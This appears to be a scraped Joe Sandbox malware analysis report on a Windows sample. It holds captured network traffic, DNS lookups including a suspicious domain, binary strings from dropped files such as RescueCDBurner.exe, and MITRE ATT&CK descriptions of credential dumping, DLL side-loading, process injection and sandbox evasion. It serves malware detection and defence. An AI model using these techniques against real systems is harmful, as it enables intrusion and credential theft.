Source: global traffic	HTTP traffic detected: GET /edge/ntp?locale=en-GB&title=New+tab&enableForceCache=true HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-viewport-height: 876sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 5.45sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 300sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-full-version: "117.0.2045.47"sec-ch-dpr: 1ect: 4gAccept: /sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_Auth=; pglt-edgeChromium-dhp=547; sptmarket=en-GB\|\|us\|en-us\|en-us\|en\|\|cf=8\|RefA=23F67CA56F3344EC8D439DB43C56096E.RefC=2025-01-09T13:56:09Z; USRLOC=; MUID=3D203036AC4A619B0A382559AD536038; MUIDB=3D203036AC4A619B0A382559AD536038; _EDGE_S=F=1&SID=3CF5BEC365736FE426CFABAC64116EFD; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=aa105f55-fe26-43b3-acff-a216f473aa9a; ai_session=CIHHYJi2caRpQYELrLG2Co\|1736430974303\|1736430974303; sptmarket_restored=en-GB\|\|us\|en-us\|en-us\|en\|\|cf=8\|RefA=23F67CA56F3344EC8D439DB43C56096E.RefC=2025-01-09T13:56:09Z
Source: global traffic	HTTP traffic detected: GET /edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true HTTP/1.1Host: ntp.msn.comConnection: keep-aliveCache-Control: max-age=0Accept: /Service-Worker: scriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-edge-ntp: {"back_block":0,"bg_cur":{"configIndex":48,"imageId":"BB1msG4y","provider":"CMSImage","userSelected":false},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"myFeed","show_greet":true,"vt_opened":false,"wpo_nx":{"v":"2","wgt":{"src":"default"}}}Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: serviceworkerReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_Auth=; pglt-edgeChromium-dhp=547; sptmarket=en-GB\|\|us\|en-us\|en-us\|en\|\|cf=8\|RefA=23F67CA56F3344EC8D439DB43C56096E.RefC=2025-01-09T13:56:09Z; USRLOC=; MUID=3D203036AC4A619B0A382559AD536038; MUIDB=3D203036AC4A619B0A382559AD536038; _EDGE_S=F=1&SID=3CF5BEC365736FE426CFABAC64116EFD; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=aa105f55-fe26-43b3-acff-a216f473aa9a; ai_session=CIHHYJi2caRpQYELrLG2Co\|1736430974303\|1736430974303; sptmarket_restored=en-GB\|\|us\|en-us\|en-us\|en\|\|cf=8\|RefA=23F67CA56F3344EC8D439DB43C56096E.RefC=2025-01-09T13:56:09Z

Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	Code function: 4x nop then or byte ptr [edi], dh	3_2_6C4A7270
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4x nop then or byte ptr [edi], dh	4_2_6B2C7270
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4x nop then push esi	4_2_6B2BF680

Source: Joe Sandbox View	IP Address: 131.253.33.203 131.253.33.203
Source: Joe Sandbox View	IP Address: 52.182.143.215 52.182.143.215
Source: Joe Sandbox View	IP Address: 162.159.61.3 162.159.61.3

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.215
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.215
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.215
Source: unknown	TCP traffic detected without corresponding DNS query: 108.139.47.33
Source: unknown	TCP traffic detected without corresponding DNS query: 108.139.47.33
Source: unknown	TCP traffic detected without corresponding DNS query: 108.139.47.33
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.215
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.215
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.215
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.215
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.215
Source: unknown	TCP traffic detected without corresponding DNS query: 108.139.47.33
Source: unknown	TCP traffic detected without corresponding DNS query: 108.139.47.33
Source: unknown	TCP traffic detected without corresponding DNS query: 108.139.47.33
Source: unknown	TCP traffic detected without corresponding DNS query: 108.139.47.33
Source: unknown	TCP traffic detected without corresponding DNS query: 108.139.47.33
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.215
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.215
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.215
Source: unknown	TCP traffic detected without corresponding DNS query: 23.219.82.80
Source: unknown	TCP traffic detected without corresponding DNS query: 23.219.82.80
Source: unknown	TCP traffic detected without corresponding DNS query: 23.219.82.80
Source: unknown	TCP traffic detected without corresponding DNS query: 23.219.82.80
Source: unknown	TCP traffic detected without corresponding DNS query: 23.219.82.80
Source: unknown	TCP traffic detected without corresponding DNS query: 23.219.82.80
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.219
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.219
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.219
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.219
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.219
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.219
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.203
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.203
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.203
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.203
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.203
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.203
Source: unknown	TCP traffic detected without corresponding DNS query: 23.219.82.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.219.82.16

Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2288301207.00000000080BC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: @s56UDoDn/Ik+JJrb59TRHyTCmjNNA4hCpIoUEjd0wU=' 'self' 'report-sample' assets.msn.cn assets2.msn.cn assets.msn.com assets2.msn.com www.msn.com www.msn.cn c.s-microsoft.com/mscc/ geolocation.onetrust.com/cookieconsentpub/v1/geo/location https://www.clarity.ms platform.bing.com/geo/AutoSuggest/v1 www.bing.com/as/ www.bing.com/s/as/ www.youtube.com js.monitor.azure.com business.bing.com/msb/ equals www.youtube.com (Youtube)
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2288301207.00000000080BC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: @s56UDoDn/Ik+JJrb59TRHyTCmjNNA4hCpIoUEjd0wU=' 'self' 'report-sample' assets.msn.cn assets2.msn.cn assets.msn.com assets2.msn.com www.msn.com www.msn.cn c.s-microsoft.com/mscc/ geolocation.onetrust.com/cookieconsentpub/v1/geo/location https://www.clarity.ms platform.bing.com/geo/AutoSuggest/v1 www.bing.com/as/ www.bing.com/s/as/ www.youtube.com js.monitor.azure.com business.bing.com/msb/g.com/msb/;worker-src * blob:00001 equals www.youtube.com (Youtube)
Source: RescueCDBurner.exe, 00000004.00000002.1433533431.000000006B4E9000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: BMkQLocalSocketPrivate::completeAsyncReadQLocalSocketPrivate::startAsyncReadQLocalSocket::waitForReadyRead WaitForSingleObject failed with error code %d.\\.\pipe\QLocalSocket::connectToServer%1: %2QLocalServerPrivate::addListener1_q_onNewConnection()QLocalServerPrivate::_q_onNewConnectione-islem.kktcmerkezbankasi.org2148.EGO.GOV.TR2087MD5 Collisions Inc. (http://www.phreedom.org/md5)41UTN-USERFirst-Hardware72:03:21:05:c5:0c:08:57:3d:8e:a5:30:4e:fe:e8:b0Digisign Server ID - (Enrich)1276011370Digisign Server ID (Enrich)12000170511846442971184640175DigiNotar Public CA 20251e:7d:7a:53:3d:45:30:41:96:40:0f:71:48:1f:45:04DigiNotar Extended Validation CAd6:d0:29:77:f1:49:fd:1a:83:f2:b9:ea:94:8c:5c:b4DigiNotar PKIoverheid CA Organisatie - G220001983DigiNotar PKIoverheid CA Overheid en Bedrijven20015536120000515120000505DigiNotar Cyber CA1200005251184640176DigiNotar Qualified CA5b:d5:60:9c:64:17:68:cf:21:0e:35:fd:fb:05:ad:41CertiID Enterprise Certificate Authoritya4:b6:ce:e3:2e:d3:35:46:26:3c:b3:55:3a:a8:92:21DigiNotar Root CA G20a:82:bd:1e:14:4e:88:14:d7:5b:1a:55:27:be:bf:3eDigiNotar Services 1024 CA36:16:71:55:43:42:1b:9d:e6:cb:a3:64:41:df:24:38DigiNotar Services CAf1:4a:13:f4:87:2b:56:dc:39:df:84:ca:7a:a1:06:49DigiNotar Root CA0c:76:da:9c:91:0c:4e:2c:9e:fe:15:d0:58:93:3c:4c.google.com05:e2:e6:a4:cd:09:ea:54:d6:65:b0:75:fe:22:a2:56global trusteed8:f3:5f:4e:b7:87:2b:2d:ab:06:92:e3:15:38:2f:b0login.live.comb0:b7:13:3e:d0:96:f9:b5:6f:ae:91:c8:74:bd:3a:c0addons.mozilla.org92:39:d5:34:8f:40:d1:69:5a:74:54:70:e1:f2:3f:43login.skype.come9:02:8b:95:78:e4:15:dc:1a:71:0a:2b:88:15:44:473e:75:ce:d4:6b:69:30:21:21:88:30:ae:86:a8:2a:7139:2a:43:4f:0e:07:df:1f:8a:a3:05:de:34:e0:c2:29login.yahoo.comd7:55:8f:da:f5:f1:10:5b:b2:13:28:2b:70:77:29:a3www.google.comf5:c8:6a:f3:61:62:f1:3a:64:f5:4f:6d:c9:58:7c:06mail.google.com04:7e:cb:e9:fc:a5:5f:7b:d0:9e:ae:36:e1:0c:ae:1eSTOULCNOStateOrProvinceNameOrganizationalUnitNameLocalityNameCountryNameCommonNameOrganizationQMap(-----END CERTIFICATE----- equals www.yahoo.com (Yahoo)
Source: RescueCDBurner.exe, 00000003.00000002.1372101532.000000006C6C9000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: BklQLocalSocketPrivate::completeAsyncReadQLocalSocketPrivate::startAsyncReadQLocalSocket::waitForReadyRead WaitForSingleObject failed with error code %d.\\.\pipe\QLocalSocket::connectToServer%1: %2QLocalServerPrivate::addListener1_q_onNewConnection()QLocalServerPrivate::_q_onNewConnectione-islem.kktcmerkezbankasi.org2148.EGO.GOV.TR2087MD5 Collisions Inc. (http://www.phreedom.org/md5)41UTN-USERFirst-Hardware72:03:21:05:c5:0c:08:57:3d:8e:a5:30:4e:fe:e8:b0Digisign Server ID - (Enrich)1276011370Digisign Server ID (Enrich)12000170511846442971184640175DigiNotar Public CA 20251e:7d:7a:53:3d:45:30:41:96:40:0f:71:48:1f:45:04DigiNotar Extended Validation CAd6:d0:29:77:f1:49:fd:1a:83:f2:b9:ea:94:8c:5c:b4DigiNotar PKIoverheid CA Organisatie - G220001983DigiNotar PKIoverheid CA Overheid en Bedrijven20015536120000515120000505DigiNotar Cyber CA1200005251184640176DigiNotar Qualified CA5b:d5:60:9c:64:17:68:cf:21:0e:35:fd:fb:05:ad:41CertiID Enterprise Certificate Authoritya4:b6:ce:e3:2e:d3:35:46:26:3c:b3:55:3a:a8:92:21DigiNotar Root CA G20a:82:bd:1e:14:4e:88:14:d7:5b:1a:55:27:be:bf:3eDigiNotar Services 1024 CA36:16:71:55:43:42:1b:9d:e6:cb:a3:64:41:df:24:38DigiNotar Services CAf1:4a:13:f4:87:2b:56:dc:39:df:84:ca:7a:a1:06:49DigiNotar Root CA0c:76:da:9c:91:0c:4e:2c:9e:fe:15:d0:58:93:3c:4c.google.com05:e2:e6:a4:cd:09:ea:54:d6:65:b0:75:fe:22:a2:56global trusteed8:f3:5f:4e:b7:87:2b:2d:ab:06:92:e3:15:38:2f:b0login.live.comb0:b7:13:3e:d0:96:f9:b5:6f:ae:91:c8:74:bd:3a:c0addons.mozilla.org92:39:d5:34:8f:40:d1:69:5a:74:54:70:e1:f2:3f:43login.skype.come9:02:8b:95:78:e4:15:dc:1a:71:0a:2b:88:15:44:473e:75:ce:d4:6b:69:30:21:21:88:30:ae:86:a8:2a:7139:2a:43:4f:0e:07:df:1f:8a:a3:05:de:34:e0:c2:29login.yahoo.comd7:55:8f:da:f5:f1:10:5b:b2:13:28:2b:70:77:29:a3www.google.comf5:c8:6a:f3:61:62:f1:3a:64:f5:4f:6d:c9:58:7c:06mail.google.com04:7e:cb:e9:fc:a5:5f:7b:d0:9e:ae:36:e1:0c:ae:1eSTOULCNOStateOrProvinceNameOrganizationalUnitNameLocalityNameCountryNameCommonNameOrganizationQMap(-----END CERTIFICATE----- equals www.yahoo.com (Yahoo)

Source: global traffic	DNS traffic detected: DNS query: bamarelakij.site
Source: global traffic	DNS traffic detected: DNS query: ntp.msn.com
Source: global traffic	DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic	DNS traffic detected: DNS query: assets.msn.com
Source: global traffic	DNS traffic detected: DNS query: sb.scorecardresearch.com
Source: global traffic	DNS traffic detected: DNS query: c.msn.com
Source: global traffic	DNS traffic detected: DNS query: api.msn.com
Source: global traffic	DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global traffic	DNS traffic detected: DNS query: clients2.googleusercontent.com

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Tactics:	Persistence
Data Sources:	Command: Command Execution, Process: Process Creation, User Account: User Account Creation
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 24EPV9vjc5.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Protection of GUI

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\1852c38f-85a3-4d8b-bfc1-88bd016cd583.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\5ba712e4-4a93-4a92-97a5-b10570c9d319.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\61181f57-409b-4722-a63d-6cdde04b9aff.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\868187b2-362a-47b1-8611-84c6d4c3aaaf.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\a463e906-43c1-4380-bf7a-e56194cb992d.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma (copy)

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-677FD575-13A0.pma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-677FD575-B14.pma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\0e41a008-f806-4ffe-b9e1-0acc52134ab8.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\0f2c90c9-6713-4e38-8cc7-7a6961b9f3b0.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\3981003b-bb87-4b6d-bdb0-9498baaaaeef.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\48f0c6d6-5908-4048-b474-db29f8764b3f.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\677af174-a813-4355-91d9-c4039e7dc0e5.tmp

Windows Analysis Report
24EPV9vjc5.exe

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary’s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform.
Tactics:	Defense Evasion
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Deletion, File: File Metadata, File: File Modification, Firewall: Firewall Rule Modification, Network Traffic: Network Traffic Content, Process: OS API Execution, Process: Process Creation, Scheduled Job: Scheduled Job Modification, User Account: User Account Authentication, User Account: User Account Deletion, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, Google Workspace, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
